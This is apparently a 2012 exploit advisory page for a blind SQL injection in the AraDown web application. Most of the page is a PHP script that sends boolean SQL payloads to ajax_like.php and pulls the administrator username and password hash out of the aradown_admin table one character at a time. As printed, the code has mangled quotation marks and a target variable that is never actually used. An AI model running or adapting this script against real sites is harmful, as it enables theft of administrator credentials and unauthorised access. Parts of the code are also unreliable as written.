AraDown Blind SQL Injection Exploit

Summary

AraDown Blind suffers from SQL Injection vulnerability.

Credit:

The information has been provided by G-B.


Details

Vulnerable Systems:
 * AraDown Blind

<?php
echo ‘

[*] Target -> ‘;

$target = stdin();
$ar = array(‘1′,’2′,’3′,’4′,’5′,’6′,’7′,’8′,’9′,’0′,’a’,’b’,’c’,’d’,’e’,’f’,’g’,’h’,’i’,’j’,’k’,’l’,’m’,’n’,’o’,’p’,’q’,’r’,’s’,’t’,’u’,’v’,’w’,’x’,’y’,’z’);

echo ‘[*] Username : ‘;

for($i=1;$i<=30;$i++){
foreach($ar as $char){
$b = send(‘http://server’,’3′ and (select substr(username,$i,1) from aradown_admin)=’$char’ # ‘);
if(eregi(‘<span class=’on_img’ align=’center’></span>’,$b) && $char == ‘z’){
$i = 50;
break;
}
if(eregi(‘<span class=’on_img’ align=’center’></span>’,$b)) continue;
echo $char;
break;
}
}

echo ‘n[*] Password : ‘;

for($i=1;$i<=32;$i++){
foreach($ar as $char){
$b = send(‘http://server’,’3′ and (select substr(password,$i,1) from aradown_admin)=’$char’ # ‘);
if(eregi(‘<span class=’on_img’ align=’center’></span>’,$b)) continue;
echo $char;
break;
}
}

function send($target,$query){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,’$target/ajax_like.php’);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,array(‘id’=>$query));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
function stdin(){
$fp = fopen(‘php://stdin’,’r’);
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
?>

Disclosure Timeline:
Published: 2012-08-08

Categories: Exploits